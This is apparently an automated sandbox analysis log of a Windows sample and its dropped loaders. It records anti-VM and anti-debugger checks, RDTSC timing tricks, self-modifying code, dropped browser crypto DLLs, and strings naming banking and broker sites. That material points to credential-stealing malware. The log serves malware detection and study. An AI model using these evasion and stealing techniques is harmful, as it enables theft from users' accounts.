Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1084770 second address: 1084785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F5828704A68h 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1084785 second address: 1084791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnp 00007F5828CEC306h 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1084791 second address: 1084795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1084795 second address: 10847A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jne 00007F5828CEC306h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 10847A7 second address: 10847AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1084EA7 second address: 1084EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 108501E second address: 1085073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5828704A74h 0x0000000a pushad 0x0000000b jmp 00007F5828704A6Ah 0x00000010 jmp 00007F5828704A72h 0x00000015 jmp 00007F5828704A79h 0x0000001a popad 0x0000001b popad 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Special instruction interceptor: First address: 7BEAFA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Special instruction interceptor: First address: 984C06 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Special instruction interceptor: First address: 9E4D47 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: B8EAFA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: D54C06 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Special instruction interceptor: First address: 1116B2D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: DB4D47 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 906B2D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Code function: 5_2_04F80A26 rdtsc 5_2_04F80A26
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 360
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 371
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\file.exe API coverage: 7.5 %
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8064 Thread sleep count: 73 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8064 Thread sleep time: -146073s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8052 Thread sleep count: 63 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8052 Thread sleep time: -126063s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7652 Thread sleep count: 360 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7652 Thread sleep time: -10800000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8028 Thread sleep count: 40 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8028 Thread sleep time: -80040s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8060 Thread sleep count: 54 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8060 Thread sleep time: -108054s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6620 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7652 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 180 Thread sleep count: 62 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 180 Thread sleep time: -124062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5500 Thread sleep count: 67 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5500 Thread sleep time: -134067s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7660 Thread sleep count: 371 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7660 Thread sleep time: -11130000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5036 Thread sleep count: 57 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5036 Thread sleep time: -114057s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1440 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5720 Thread sleep count: 45 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5720 Thread sleep time: -90045s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1964 Thread sleep count: 50 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1964 Thread sleep time: -100050s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7660 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_004139B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040E270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00401710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004143F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 0_2_00414050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_004133C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401160 GetSystemInfo,ExitProcess, 0_2_00401160
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: Amcache.hve.13.dr Binary or memory string: VMware
Source: axplong.exe, 00000014.00000002.3277275647.00000000007DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW)F
Source: BGIJDGCA.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: BGIJDGCA.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: BGIJDGCA.0.dr Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.13.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000002.2443461235.0000000002774000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2443461235.0000000002736000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000013.00000002.3285409912.000000000144B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000014.00000002.3277275647.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000014.00000002.3277275647.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002765000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 00000015.00000002.2792599866.0000000002739000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2794491755.0000016DCE920000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3282835116.00000221E1E3A000.00000004.00000020.00020000.00000000.sdmp, 48f0ec6733.exe, 0000002C.00000002.2900300016.000000000251D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: firefox.exe, 00000028.00000002.3296660435.00000221E2219000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: BGIJDGCA.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.13.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: firefox.exe, 00000028.00000002.3282835116.00000221E1E3A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: BGIJDGCA.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Amcache.hve.13.dr Binary or memory string: vmci.sys
Source: BGIJDGCA.0.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: BGIJDGCA.0.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: BGIJDGCA.0.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: BGIJDGCA.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: BGIJDGCA.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 48f0ec6733.exe, 0000002C.00000002.2899871505.00000000024B0000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: BGIJDGCA.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.13.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: firefox.exe, 00000028.00000002.3299885404.00000221E2640000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: BGIJDGCA.0.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: BGIJDGCA.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.13.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: RoamingCBFCFBFBFB.exe, RoamingCBFCFBFBFB.exe, 00000005.00000002.2284013109.000000000093C000.00000040.00000001.01000000.00000009.sdmp, RoamingIJDGCAEBFI.exe, RoamingIJDGCAEBFI.exe, 00000008.00000002.2308007629.000000000106A000.00000040.00000001.01000000.0000000B.sdmp, axplong.exe, axplong.exe, 00000009.00000002.2310490421.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmp, axplong.exe, 0000000A.00000002.2310162884.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000E.00000002.2338932690.000000000085A000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 0000000F.00000002.2339600166.000000000085A000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000013.00000002.3274900167.000000000085A000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000014.00000002.3281696216.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: BGIJDGCA.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
Source: BGIJDGCA.0.dr Binary or memory string: discord.comVMware20,11696428655f
Source: explorti.exe, 00000013.00000002.3285409912.0000000001419000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: BGIJDGCA.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 48f0ec6733.exe, 0000002C.00000002.2900300016.00000000024CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx3R
Source: 48f0ec6733.exe, 0000002C.00000002.2899871505.00000000024B0000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware }!
Source: Amcache.hve.13.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: BGIJDGCA.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 48f0ec6733.exe, 0000002C.00000002.2900300016.000000000251D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
Source: BGIJDGCA.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: BGIJDGCA.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: BGIJDGCA.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.13.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: BGIJDGCA.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: BGIJDGCA.0.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: BGIJDGCA.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.13.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: firefox.exe, 00000028.00000002.3299885404.00000221E2640000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3293336101.0000022B019F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: BGIJDGCA.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: BGIJDGCA.0.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: BGIJDGCA.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: BGIJDGCA.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.13.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin`
Source: BGIJDGCA.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.13.dr Binary or memory string: \driver\vmci,\driver\pci
Source: firefox.exe, 0000002D.00000002.3293336101.0000022B019F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWM
Source: BGIJDGCA.0.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: firefox.exe, 00000021.00000003.2794491755.0000016DCE8D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: Amcache.hve.13.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: BGIJDGCA.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Amcache.hve.13.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: RoamingCBFCFBFBFB.exe, 00000005.00000002.2284013109.000000000093C000.00000040.00000001.01000000.00000009.sdmp, RoamingIJDGCAEBFI.exe, 00000008.00000002.2308007629.000000000106A000.00000040.00000001.01000000.0000000B.sdmp, axplong.exe, 00000009.00000002.2310490421.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmp, axplong.exe, 0000000A.00000002.2310162884.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000E.00000002.2338932690.000000000085A000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 0000000F.00000002.2339600166.000000000085A000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000013.00000002.3274900167.000000000085A000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000014.00000002.3281696216.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: BGIJDGCA.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Code function: 5_2_04F80A26 rdtsc 5_2_04F80A26
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041ACFA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404610 VirtualProtect ?,00000004,00000100,00000000 0_2_00404610
